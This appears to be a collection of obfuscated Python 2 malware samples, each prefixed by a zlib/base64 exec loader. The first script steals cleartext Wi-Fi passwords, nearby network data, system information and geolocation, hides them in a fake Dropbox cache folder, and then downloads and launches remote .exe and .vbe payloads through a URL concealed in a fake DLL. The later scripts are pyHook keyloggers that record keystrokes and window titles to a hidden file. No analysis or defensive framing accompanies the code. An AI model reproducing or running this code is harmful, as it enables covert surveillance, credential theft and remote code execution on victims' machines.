RDqMMzXlb+GOxuVaLR85cVhl3dmBzkUR7vJANyuB6G9NVFFv39z6/FekcBjVfrfCELQiE2qEM/3P7IYq/S2mlEAa/lNtvnmawz7unOfRvgcZss2gfNUW6TwkuG0odgA+ODSlXoqX1LxLj/CebW53D1O/+YyHnsDF+58Yld/6DhsHH8/DL9asa5liWsj2MiyZubeNdpqj0hEy1i9EyVkIG3yhyewwdkQikjpTP9tzCbBdyr/eNkqRjqJps3JWNSuUXnw43OqbfJ6Cs3UoON1R8KDpPmiuiqU+9nLGDJo5BOjI5oqXTzDiAMVlt2uYoGfV5yPdqGeCaQyjruk8y+4Kzm7q4mYtm2omIrR0pVIW1PKO5+ZaCALXFomlv6Lqpxsu35gumOLvdZrnc6J2znGFJHhWmQt2UqMMLst4mLN3cHpd1+yZRhzh/YVyHw1uFvSDrbVNMi+Oi0reKemGK6duEfUu3x2V9e6Mo/IIs/CZZWZQdF5W9SdTfJD0u6u8fiuJ7zRnyZlWmy4xCVEbNMESz1mtpqWbwKnRSpz+2Fk6Jj3D11cgNQnomRSA+BnPxrqdoNjUPBs18YO0I48kwQIqYL/MgEE6VJ9l2vou8sa8j+kCKncXjzco1nLSzVftkdXd7i1lctnC6UV6lDrWBiiCFZVkZRDzwgS1pJ472q000lw1siLE3HdfxRr2hM/G6J6t2u6tLMYdq3/EAvFPJ7R6vusOHDdnivOiYlTjB87/F6xrIwFektPVsrGR7I3WvnzLpQo6kUPvagMyZ84Tzd4jhntYzqon3FiC+Tx87ht+u1qx7ooLgvqyyinLMokOtmmaWNfU39Z9roY9mfvWegGWpGFaeE8kTxZ5S6laVwVfpHUNZX5HG9SfInxjHf2zH11IeV2RHWOgwQZOJ2hvzw+Ly/QotW1337vrBKz/We3I0IJvy5YJSrjAyUNPflmhY2hmh2CDw/3LroGc3VEbMPClRSA30ORtJkDLvwXYzQzQcqh2drfHJ0zdAJmM0GWuU09ICqnLLVr4Oor0sIaJNI1lnnub0zSWsuJKtSrVLV1lzdXBa5ndqCXqk0Vd1+KioXK8t3gZ40v3IQyNPP/ytlEicIZgKWPbjstcv5kqpNP1CxgIN6qdg2ln0/wC5yHDL')))
import json
import json as simplejson
import os
import base64
import urllib2
import subprocess
from datetime import datetime
import time
import requests
from uuid import getnode as get_mac
if 64-64:i11iIiiIii
OO0o=datetime.utcnow().strftime('%Y-%m-%d-%H_%M_%S.%f')[:-3]
if 81-81:Iii1I1+OO0O0O%iiiii%ii1I-ooO0OO000o
try:
ii11i='netsh wlan show networks mode=bssid'
oOooOoO0Oo0O=os.popen(ii11i)
iI1=oOooOoO0Oo0O.readlines()
if 43-43:I11i11Ii
ii11i='netsh wlan show interfaces'
oO00oOo=os.popen(ii11i)
OOOo0=oO00oOo.readlines()
Oooo000o=iI1+OOOo0
if 6-6:i1*ii1IiI1i%OOooOOo/I11i/o0O/IiiIII111iI
IiII=[]
iI1Ii11111iIi=[]
i1i1II=[]
if 96-96:o0OO0-Oo0ooO0oo0oO.I1i1iI1i-o00ooo0/o00*Oo0oO0ooo
if 56-56:ooO00oOoo-I1i1iI1i
except:
pass
if 64-64:o0O%ii1IiI1i
for i1I1Iiii1111 in iI1:
if 22-22:I1i1iI1i.o00
try:
(I11,Oo0o0000o0o0)=i1I1Iiii1111.split("BSSID")
(oOo0oooo00o,oO0o0o0ooO0oO)=Oo0o0000o0o0.split(": ")
oo0o0O00=oO0o0o0ooO0oO.replace("\n","")
except:
pass
else:
try:
IiII.append(oo0o0O00)
except:
pass
try:
(oO,i1iiIIiiI111)=i1I1Iiii1111.split("al")
except:
pass
else:
if 62-62:i11iIiiIii-ooO0OO000o
try:
(IIIiI11ii,O000oo)=i1iiIIiiI111.split("%")
try:
if 3-3:o00ooo0+Iii1I1
(IIIiI11ii,O000oo)=i1iiIIiiI111.split(": ")
I1Ii=O000oo.replace("%","")
o0oOo0Ooo0O=I1Ii.replace(" ","")
OO00O0O0O00Oo=o0oOo0Ooo0O.replace("\n","")
if 25-25:I11i%ooO0OO000o-ooO0OO000o.ooO0OO000o
except:
pass
else:
try:
iI1Ii11111iIi.append("-"+OO00O0O0O00Oo)
except:
pass
if 32-32:ii1I.Oo0ooO0oo0oO%ii1IiI1i.I11i
except:
pass
if 42-42:Oo0oO0ooo+o0O
try:
(OOoO000O0OO,iiI1IiI)=i1I1Iiii1111.split("Canal")
except:
try:
(OOoO000O0OO,iiI1IiI)=i1I1Iiii1111.split("Channel")
except:
pass
else:
try:
(II,ooOoOoo0O)=iiI1IiI.split(": ")
OooO0=ooOoOoo0O.replace(" ","")
II11iiii1Ii=OooO0.replace("\n","")
if 70-70:IiiIII111iI/OO0O0O%ooO00oOoo%i11iIiiIii.I11i11Ii
except:
pass
else:
try:
i1i1II.append(II11iiii1Ii)
except:
pass
try:
if 68-68:Oo0ooO0oo0oO+o0OO0.OO0O0O-o00%OO0O0O-ooO00oOoo
oOOO00o='https://location.services.mozilla.com/v1/geolocate?key=test'
if 97-97:Oo0ooO0oo0oO%Oo0ooO0oo0oO+ooO0OO000o*o00ooo0
o0o00o0={"wifiAccessPoints":[]}
if 25-25:i1-o00.iiiii
for I11ii1 in range(len(IiII)):
I11II1i=IiII[I11ii1]
IIIII=iI1Ii11111iIi[I11ii1]
ooooooO0oo=i1i1II[I11ii1]
if 49-49:I11i*OO0O0O/ii1I/i11iIiiIii/I11i
try:
I1i1I1II={"macAddress":IiII[I11ii1],"signalStrength":int(iI1Ii11111iIi[I11ii1]),"channel":int(i1i1II[I11ii1]),"age":int(0)}
except:
pass
o0o00o0["wifiAccessPoints"].append(I1i1I1II)
if 45-45:Oo0oO0ooo.OOooOOo
oOii1i1I1i=json.dumps(o0o00o0,sort_keys=True,indent=4,separators=(',',': '))
o00oOO0=urllib2.urlopen(oOOO00o,oOii1i1I1i).read()
oOoo=simplejson.loads(o00oOO0)
if 8-8:OOooOOo
if 60-60:Oo0ooO0oo0oO/Oo0ooO0oo0oO
except:
pass
if 46-46:I1i1iI1i*o0OO0-ii1IiI1i*IiiIII111iI-Oo0oO0ooo
try:
if 83-83:iiiii
Iii111II="http://maps.google.com/maps?q="+str(oOoo["location"]["lat"])+","+str(oOoo["location"]["lng"])
if 9-9:ii1IiI1i
try:
i11="systeminfo"
O0oo0OO0oOOOo=subprocess.Popen(i11,shell=True,stdout=subprocess.PIPE)
oOoo,i1i1i11IIi=O0oo0OO0oOOOo.communicate()
if 33-33:I11i+o0OO0*ii1IiI1i-i1/IiiIII111iI%I1i1iI1i
II1i1IiiIIi11=os.getenv('LOCALAPPDATA')
with open(II1i1IiiIIi11+"\\Microsoft\\Dropbox\\avatar_cache\\gt.txt",'a')as iI1Ii11iII1:
iI1Ii11iII1.writelines("------------------------GEO---------------------------\n\n\n")
iI1Ii11iII1.writelines(Iii111II+"\n")
iI1Ii11iII1.writelines("\n\n\n-------------------SYSTEMINFO---------------------\n\n\n")
iI1Ii11iII1.writelines(oOoo)
iI1Ii11iII1.close()
if 51-51:ooO0OO000o*ii1IiI1i%I11i*ooO0OO000o%o0O/ooO00oOoo
except:
pass
if 49-49:I11i
for IIii1Ii1 in OOOo0:
try:
(I1II11IiII,OOO0OOo)=IIii1Ii1.split("SSID")
(I1I111,i11iiI111I)=OOO0OOo.split(": ")
II11i1iIiII1=i11iiI111I.replace("\n","")
except:
pass
else:
break
if 17-17:o00
except:
pass
if 62-62:OO0O0O*OOooOOo
try:
i1OOO='netsh wlan show profile name='+'"'+II11i1iIiII1+'"'+' key=clear'
Oo0oOOo=os.popen(i1OOO)
Oo0OoO00oOO0o=Oo0oOOo.readlines()
if 80-80:IiiIII111iI+o0OO0-o0OO0%o00ooo0
OoOO0oo0o=os.getenv('LOCALAPPDATA')
II11i1I11Ii1i=(OoOO0oo0o+"\\Microsoft\\Dropbox\\avatar_cache\\")
if 97-97:ooO00oOoo%o00ooo0*I1i1iI1i+I11i.o0OO0+o0OO0
i11="systeminfo"
O0oo0OO0oOOOo=subprocess.Popen(i11,shell=True,stdout=subprocess.PIPE)
oOoo,i1i1i11IIi=O0oo0OO0oOOOo.communicate()
if 59-59:OO0O0O*i11iIiiIii/o0O*ii1I*Iii1I1
OOo0o=open(II11i1I11Ii1i+OO0o+"-gtn.txt","w")
OOo0o.writelines("------------------------GEO---------------------------\n\n\n")
OOo0o.writelines(Iii111II)
OOo0o.writelines("\n\n\n-----------------CONNECTION DATA--------------------\n\n\n")
OOo0o.writelines(Oo0OoO00oOO0o)
OOo0o.writelines("\n\n\n-------------------NEARBY NETWORKS---------------------\n\n\n")
OOo0o.writelines(iI1)
OOo0o.writelines("\n\n\n-------------------SYSTEMINFO---------------------\n\n\n")
OOo0o.writelines(oOoo)
OOo0o.close()
if 50-50:o00
if 14-14:Oo0ooO0oo0oO%ii1IiI1i*Oo0ooO0oo0oO
except:
pass
if 16-16:OOooOOo.ooO00oOoo+i11iIiiIii
if 38-38:o00*o0OO0.I11i
ooo0OO="%012X"%get_mac()
O0=os.getenv('USERNAME')
ii1ii1ii=ooo0OO+"-"+O0
II1i1IiiIIi11=os.getenv('LOCALAPPDATA')
oooooOoo0ooo="02"
if 6-6:Oo0ooO0oo0oO-I1i1iI1i+OO0O0O-Oo0oO0ooo-i11iIiiIii
if 79-79:OOooOOo-Iii1I1*ii1IiI1i+OOooOOo%Iii1I1*Iii1I1
def oOOo0():
try:
with open("C:\\Python2.7\\DLLs\\date.dll","r")as iI1Ii11iII1:
oo00O00oO=iI1Ii11iII1.readlines()
iIiIIIi=oo00O00oO[8]
ooo00OOOooO=base64.b64decode(iIiIIIi)
O00OOOoOoo0O=ooo00OOOooO.strip()
if 77-77:o00ooo0%o00ooo0*IiiIII111iI-i11iIiiIii
Oo0oO=O00OOOoOoo0O+oooooOoo0ooo+"/"+ii1ii1ii+"/PSLte/file.html"
IIiIi1iI=requests.get(Oo0oO)
i1IiiiI1iI=base64.b64decode(IIiIi1iI.content)
if 49-49:I1i1iI1i/ii1IiI1i.ooO0OO000o
if '404 Not Found' not in IIiIi1iI.content:
with open(II1i1IiiIIi11+"\\Microsoft\\Dropbox\\QuitReports\\file.exe",'wb')as iI1Ii11iII1:
iI1Ii11iII1.write(i1IiiiI1iI)
if 68-68:i11iIiiIii%o0O+i11iIiiIii
except:
pass
if 31-31:ooO0OO000o.I11i11Ii
try:
Oo0oO=O00OOOoOoo0O+oooooOoo0ooo+"/"+ii1ii1ii+"/PSLtv/file.html"
IIiIi1iI=requests.get(Oo0oO)
i1IiiiI1iI=base64.b64decode(IIiIi1iI.content)
if 1-1:i1/I11i%o00ooo0*o00.i11iIiiIii
if '404 Not Found' not in IIiIi1iI.content:
with open(II1i1IiiIIi11+"\\Microsoft\\Dropbox\\QuitReports\\file.vbe",'wb')as iI1Ii11iII1:
iI1Ii11iII1.write(i1IiiiI1iI)
if 2-2:o0O*Oo0ooO0oo0oO-OO0O0O+I11i11Ii.IiiIII111iI%o00ooo0
except:
pass
if 92-92:o00ooo0
if 25-25:i1-I11i11Ii/iiiii/I11i
def II111iiiI1Ii():
if 78-78:I1i1iI1i%Oo0oO0ooo+o0O
try:
with open("date.dll","r")as iI1Ii11iII1:
oo00O00oO=iI1Ii11iII1.readlines()
iIiIIIi=oo00O00oO[8]
ooo00OOOooO=base64.b64decode(iIiIIIi)
OOooOoooOoOo=ooo00OOOooO.strip()
if 84-84:o00
Oo0oO=OOooOoooOoOo+oooooOoo0ooo+"/"+ii1ii1ii+"/PSLte/file.html"
IIiIi1iI=requests.get(Oo0oO)
i1IiiiI1iI=base64.b64decode(IIiIi1iI.content)
if 86-86:OOooOOo-I1i1iI1i-ii1IiI1i*o00ooo0
if '404 Not Found' not in IIiIi1iI.content:
with open(II1i1IiiIIi11+"\\Microsoft\\Dropbox\\QuitReports\\file.exe",'wb')as iI1Ii11iII1:
iI1Ii11iII1.write(i1IiiiI1iI)
if 66-66:iiiii+Iii1I1
except:
pass
if 11-11:Oo0ooO0oo0oO+iiiii-ii1IiI1i/I11i+i1.ooO0OO000o
try:
Oo0oO=OOooOoooOoOo+oooooOoo0ooo+"/"+ii1ii1ii+"/PSLtv/file.html"
IIiIi1iI=requests.get(Oo0oO)
i1IiiiI1iI=base64.b64decode(IIiIi1iI.content)
if 41-41:I1i1iI1i-Iii1I1-Iii1I1
if '404 Not Found' not in IIiIi1iI.content:
with open(II1i1IiiIIi11+"\\Microsoft\\Dropbox\\QuitReports\\file.vbe",'wb')as iI1Ii11iII1:
iI1Ii11iII1.write(i1IiiiI1iI)
if 68-68:o0OO0%Oo0oO0ooo
except:
pass
if 88-88:OO0O0O-ooO00oOoo+o0OO0
if 40-40:I11i11Ii*I1i1iI1i+o0OO0%o00ooo0
def OOOOOoo0():
try:
time.sleep(04)
ii1=II1i1IiiIIi11+"\\Microsoft\\Dropbox\\QuitReports\\file.exe"
if os.path.isfile(ii1):
os.startfile(ii1)
if 11-11:o00*I11i11Ii.OO0O0O%iiiii+o00ooo0
except:
pass
if 78-78:ii1IiI1i.o0OO0+ii1IiI1i/Oo0ooO0oo0oO/ii1IiI1i
try:
time.sleep(04)
ii1=II1i1IiiIIi11+"\\Microsoft\\Dropbox\\QuitReports\\file.vbe"
if os.path.isfile(ii1):
os.startfile(ii1)
if 54-54:OOooOOo%o00ooo0
except:
pass
if 37-37:OOooOOo*i1/ooO00oOoo-o00ooo0%ooO0OO000o.IiiIII111iI
if 88-88:o00ooo0.ooO0OO000o*ooO0OO000o%Oo0oO0ooo
oOOo0()
II111iiiI1Ii()
OOOOOoo0()
#######################
## dd2b0e2c2cb8a83574248bda54ce472899b22eb602e8ebecafcce2c4355177fe
import zlib, base64
exec(zlib.decompress(base64.b64decode('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')))
import sys
import os
import time
import pyHook
import pythoncom
if 64-64:i11iIiiIii
if 65-65:O0/iIii1I11I1II1%OoooooooOO-i1IIi
try:
o0OO00=os.getenv('LOCALAPPDATA')
oo=(o0OO00+"\\Microsoft\\Dropbox\\avatar_cache\\")
if 27-27:oO0OooOoO*o0Oo
except:
pass
if 5-5:OoO0O00
IIiIiII11i={8:'(bksp)',9:'(tab)',13:'(Enter)',19:'(Paus)',20:'(BMayus)',27:'(ESC)',32:'(Barr-espa)',33:'(pag-up)',34:'(pag-dn)',35:'(END)',36:'(home)',37:'(Fle-Iz)',38:'(Fle-Arr)',39:'(Fle-Der)',40:'(Fle-Aba)',44:'(Prt-Scr)',45:'(INSET)',46:'(Desjr)',48:'0',49:'1',50:'2',51:'3',52:'4',53:'5',54:'6',55:'7',56:'8',57:'9',64:'@',65:'a',66:'b',67:'c',68:'d',69:'e',70:'f',71:'g',72:'h',73:'i',74:'j',75:'k',76:'l',77:'m',78:'n',79:'o',80:'p',81:'q',82:'r',83:'s',84:'t',85:'u',86:'v',87:'w',88:'x',89:'y',90:'z',91:'(Win-Izq)',92:'(Win-Dcha)',93:'(App)',96:'(#0)',97:'(#1)',98:'(#2)',99:'(#3)',100:'(#4)',101:'(#5)',102:'(#6)',103:'(#7)',104:'(#8)',105:'(#9)',106:'#(*)',107:'#(+)',109:'#(-)',110:'#(.)',111:'#(/)',112:'(F1)',113:'(F2)',114:'(F3)',115:'(F4)',116:'(F5)',117:'(F6)',118:'(F7)',119:'(F8)',120:'(F9)',121:'(F10)',122:'(F11)',123:'(F12)',144:'(Bloq#)',145:'(scrolllock)',160:'(Shitf-Izq)',161:'(Shitf-Der)',162:'(CTRL-Izq)',163:'(CTRL-Der)',164:'(ALT-Izq)',165:'(ALT-Dcha)',186:';',187:'=',188:',',189:'-',190:'.',191:'/',192:'~',219:'[',220:'\\',221:']',222:"'"}
if 51-51:oOo0O0Ooo*I1ii11iIi11i
if 48-48:oO0o/OOooOOo/I11i/Ii1I
class IiiIII111iI():
try:
f=open(oo+"vpr.html","a")
except Exception,e:
try:
f=open(oo+"vpr.html","w")
except Exception,e:
pass
try:
f.write('</font></b><br><b><font color="#00F">--------------</font></b><br>')
except:
pass
try:
f.write('</font></b><br><b><font color="#00F"> Date: '+time.asctime()+"</font></b><br>")
except:
pass
try:
f.close()
except:
pass
if 34-34:iii1I1I/O00oOoOoO0o0O.O0oo0OO0+Oo0ooO0oo0oO.I1i1iI1i-II
def onApp(self,appname):
if 100-100:i1IIi.I1i1iI1i/Oo0ooO0oo0oO*OoooooooOO+iii1I1I*I11i
try:
try:
self.f=open(oo+'vpr.html',"a")
if 99-99:O0oo0OO0.Ii1I/iIii1I11I1II1*iIii1I11I1II1
except Exception,II1iI:
self.f=open(oo+'vpr.html',"w")
if appname!=self.app:
if 27-27:O0oo0OO0*oOo0O0Ooo.oO0OooOoO
try:
self.app=appname
self.f.write('</font</b><br><b><font color="#00F">-----------------</font></b><br>')
except:
pass
try:
self.f.write('</font></b><br><font color="#00F">Date: '+time.asctime()+'</font><br><b>Winw:'+self.app+'</b>:<br><font color="#FF0000"><b>')
except:
pass
if 1-1:oO0OooOoO-OOooOOo%i11iIiiIii+Oo0ooO0oo0oO.I1i1iI1i
try:
sys.stdout.write('</font><br><br><b><font color="#00F">Date: '+time.asctime()+'</font></b><br><b>Winw: '+self.app+':</b><br><b><font color="#FF0000"><b>')
except:
pass
if 55-55:iIii1I11I1II1-o0Oo.O00oOoOoO0o0O*Oo0ooO0oo0oO*i1IIi/iIii1I11I1II1
try:
self.f.close()
except:
pass
except:
pass
if 79-79:I11i+I1i1iI1i.II*Oo0ooO0oo0oO%iii1I1I.o0Oo
def onKeyboardEvent(self,event):
try:
O0o0o00o0Oo0=event.KeyID
ii11=event.Ascii
if 28-28:II+I1i1iI1i-II.OoooooooOO
try:
self.onApp(event.WindowName)
except:
pass
try:
self.f=open(oo+'vpr.html',"a")
except Exception,II1iI:
self.f=open(oo+'vpr.html',"w")
if((O0o0o00o0Oo0 in range(48,91))or(O0o0o00o0Oo0 in range(96,112))or(O0o0o00o0Oo0 in range(186,223))or(O0o0o00o0Oo0==32)):
try:
sys.stdout.write(chr(ii11))
except:
pass
if 97-97:oOo0O0Ooo.iii1I1I
try:
self.f.write(chr(ii11))
except:
pass
if 32-32:OoO0O00-oO0OooOoO-i11iIiiIii%I1i1iI1i
if O0o0o00o0Oo0==8:
sys.stdout.write('\b\x00\x00\b')
if 54-54:Ii1I%O0+o0Oo-O0oo0OO0/iii1I1I
self.f.write('</font></b><font color="#000">[DEL]</font><b><font color="#FF0000">')
if 31-31:oOo0O0Ooo+oO0OooOoO
if O0o0o00o0Oo0==9:
sys.stdout.write('\t')
self.f.write('</font></b><br><font color="#FF0000">\t<b>')
if 13-13:Ii1I*I11i*o0Oo
if O0o0o00o0Oo0==13:
sys.stdout.write('\t|')
self.f.write('</font></b><br><font color="#FF0000">\t|<b>')
if 55-55:oO0OooOoO
elif((O0o0o00o0Oo0 not in range(48,91))and(O0o0o00o0Oo0 not in range(96,112))and(O0o0o00o0Oo0 not in range(160,162))and(O0o0o00o0Oo0 not in range(186,223))and(O0o0o00o0Oo0!=32)and(O0o0o00o0Oo0!=8)and(O0o0o00o0Oo0!=9)and(O0o0o00o0Oo0!=13)):
try:
if 43-43:I1ii11iIi11i-i1IIi+I1i1iI1i+O00oOoOoO0o0O
sys.stdout.write("[%s]"%(IIiIiII11i[O0o0o00o0Oo0]))
if 17-17:oO0o
self.f.write('</b></font></b><font color="#000">'+"[%s]"%(IIiIiII11i[O0o0o00o0Oo0])+'</font><b><font color="#FF0000">')
if 64-64:O00oOoOoO0o0O%i1IIi%OoooooooOO
except Exception,II1iI:
sys.stdout.write("[%d]"%(O0o0o00o0Oo0))
self.f.write("[%d]"%(O0o0o00o0Oo0))
if 3-3:O0oo0OO0+O0
self.f.close()
if 42-42:Ii1I/i1IIi+i11iIiiIii-O00oOoOoO0o0O
return True
except:
if 78-78:oOo0O0Ooo
pass
if 18-18:O0-O0oo0OO0/O0oo0OO0+II%II-Oo0ooO0oo0oO
def __init__(self):
try:
self.app=''
except:
pass
if 62-62:O0oo0OO0-Oo0ooO0oo0oO-I1ii11iIi11i%i1IIi/I11i
if 77-77:oO0OooOoO-oO0OooOoO.o0Oo/oO0o
if __name__=='__main__':
i1iIIIiI1I=IiiIII111iI()
OOoO000O0OO=pyHook.HookManager()
OOoO000O0OO.KeyDown=i1iIIIiI1I.onKeyboardEvent
OOoO000O0OO.HookKeyboard()
pythoncom.PumpMessages()
#######################
## 01df8765ea35db382d1dd67a502bf1d9647d8fe818ec31abff41c7e41c2816c0
import zlib, base64
exec(zlib.decompress(base64.b64decode('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')))
import sys
import os
import time
import pyHook
import pythoncom
if 64-64:i11iIiiIii
if 65-65:O0/iIii1I11I1II1%OoooooooOO-i1IIi
try:
